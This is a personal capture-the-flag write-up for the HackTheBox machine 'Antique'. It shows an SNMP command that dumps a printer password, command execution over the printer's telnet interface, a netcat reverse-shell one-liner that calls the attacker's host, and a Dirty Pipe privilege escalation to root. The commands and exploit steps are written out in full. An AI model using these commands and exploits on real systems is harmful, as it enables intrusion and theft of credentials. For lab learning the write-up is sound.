HackTheBox: Antique
01/13/2024
Finally got VIP. This is an old retired easy box, rated roughly the same difficulty as [[Busqueda]]
Im going to use 'Guided Mode' if I get stuck, because I want to finish this in about 4 hours.
Enumeration
Only a single open port: telnet on 23.
Enumerating telnet
When I connect to the service via telnet I get a header "HP JetDirect", and then a password prompt. Let me look up what the default password for HP JetDirect is.
It doesnt look like there is a default password, but I stumbled across an exploit specific to JetDirect passwords without actually looking for it: (https://www.exploit-db.com/exploits/22319)
Dumping printer credentials using CVE-2002-1048
Despite knowing the exploit, this took me almost half an hour to do because I have no experience with SNMP protocol or its utilities. That was a pain in the nuts.
Basically, in this exploit, you query the printer (if 'query' is the right word) for a specific object identifier (OID) string. For whatever reason, one particular OID string will respond with hex-encoded credentials on vulnerable printers. I guess some printers store the password as an object?
Either way, I finally got it working. Here's what I did:
$ snmpget -v2c -cprivate -mALL 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
<SNIP>
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
</SNIP>
Then, to flex my new sed skills, I converted this to a printf-friendly format as follows. First, I copy+pasted everything after "BITS:" to a text file. I named this file hexdump. Then:
$ cat hexdump
50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135
$ sed 's/ /\\x/g' hexdump
50\x40\x73\x73\x77\x30\x72\x64\x40\x31\x32\x33\x21\x21\x31\x32\x33\x1\x3\x9\x17\x18\x19\x22\x23\x25\x26\x27\x30\x31\x33\x34\x35\x37\x38\x39\x42\x43\x49\x50\x51\x54\x57\x58\x61\x65\x74\x75\x79\x82\x83\x86\x90\x91\x94\x95\x98\x103\x106\x111\x114\x115\x119\x122\x123\x126\x130\x131\x134\x135
<notice that the leading '50' does not have the '\x'. Need to manually add that in the next step>
$ printf "\x50\x40\x73\x73\x77\x30\x72\x64\x40\x31\x32\x33\x21\x21\x31\x32\x33\x1\x3\x9\x17\x18\x19\x22\x23\x25\x26\x27\x30\x31\x33\x34\x35\x37\x38\x39\x42\x43\x49\x50\x51\x54\x57\x58\x61\x65\x74\x75\x79\x82\x83\x86\x90\x91\x94\x95\x98\x103\x106\x111\x114\x115\x119\x122\x123\x126\x130\x131\x134\x135"
P@ssw0rd@123!!123 ▒"#%&'01345789BCIPQTWXaetuy��������3614592360145
So to recap the above, I used sed to replace all spaces in the hexdump file with \x, because that's how the printf function accepts hex input.
Then I ran printf with this string (and manually added the first \x) to convert the hex to ASCII.
And there we have it; the printer password appears to be ==P@ssw0rd@123!!123==.
Searching for RCE
This is a weird one... I don't really know what to do inside a printer. I looked on searchsploit for "jetdirect", and one that popped up was an RCE path traversal vulnerability that had a metasploit module. Ill give this a shot.
$ msfconsole
msf6 > use exploit/linux/misc/hp_jetdirect_path_traversal
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > options
Module options (exploit/linux/misc/hp_jetdirect_path_traversal):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 9100 yes The target port (TCP)
SNMPPORT 161 yes The SNMP port
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TIMEOUT 1 yes SNMP Timeout
URIPATH no The URI to use for this exploit (default is random)
VERSION 1 yes SNMP Version <1/2c>
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/unix/bind_busybox_telnetd):
Name Current Setting Required Description
---- --------------- -------- -----------
LOGIN_CMD /bin/sh yes Command telnetd will execute on connect
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Unix (In-Memory)
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set RHOSTS 10.10.11.107
RHOSTS => 10.10.11.107
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set COMMUNITY private
COMMUNITY => private
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set SNMPPORT 23
SNMPPORT => 23
msf6 exploit(linux/misc/hp_jetdirect_path_traversal) > set RPORT 23
For whatever fucked-up reason, this metasploit module apparently doesnt account for the fact that a password might be set up. So I cant use this, at least not without some modification. I could also check github for other PoCs for this CVE. But if that fails, I can just read the metasploit module code and do it myself by hand.
Or maybe I can disable the password inside the printer? Let's try that first.
The closest thing I saw was to whitelist an IP address using allow: <ip>
Using the printer's shell
Like an idiot, I missed this option when I was viewing the help menu on the printer's telnet interface. But you can run system commands using exec.
Please type "?" for HELP
> ?
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>
Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)
addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)
exec: execute system commands (exec id)
exit: quit from telnet session
There it is, down at the bottom.
> exec ls
telnet.py
user.txt
> exec whoami
lp
Damn, that's pretty cool that these have actual linux shells. I suppose that renders the metasploit thing redundant, since I already have RCE through this.
Let me spawn a busybox-style reverse shell:
> exec rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.12 1234 >/tmp/f
On my local machine:
$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.107] 59416
/bin/sh: 0: can't access tty; job control turned off
$ whoami
lp
Upgrading the reverse shell: Doing it the right way
I never really try the tty upgrade stuff on reverse shells, because the zsh shell kali uses doesnt seem to like the tty commands.
But Im going to give it another shot. Ill switch to bash and try it that way
$ bash
$nc -nlvp 1234
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.107] 59418
/bin/sh: 0: can't access tty; job control turned off
$ export TERM=xterm
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
lp@antique:~$
<background the revshell with CTRL-Z>
kali@kali: stty raw -echo
kali@kali: fg <you wont actually see the prompt here>
lp@anitque:~$ reset <this corrects the format>
lp@anitque:~$
Beautiful. That's the first time Ive done that successfully. Now I have tab-completion on the revshell
Enumerating from inside the printer shell
The first thing I checked was for sudo permissions, which didn't work because I don't know this user's password.
The second check was for interesting SUIDS, but there were no useful ones.
The third check was for the kernel version, which was 5.13.0. Now THAT's useful; this version is vulnerable to the Dirty Pipe exploit.
Priv esc: the 'Dirty Pipe' exploit
This couldnt have been easier, to be honest.
I didn't even need to download the code. On my local machine I ran
$ searchsploit -x linux/local/50808.c >> dirtypipe.c
to dump the source code stored in searchsploit to a c file. I transferred this to the victim by hosting a python server and using wget.
On the victim I compiled it and ran it, attempting to hijack the pkexec SUID binary:
lp@antique:~$ gcc dirtypipe.c -o dirtypipe
lp@antique:~$ which pkexec
/usr/bin/pkexec
lp@antique:~$ ./dirtypipe /usr/bin/pkexec
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# whoami
root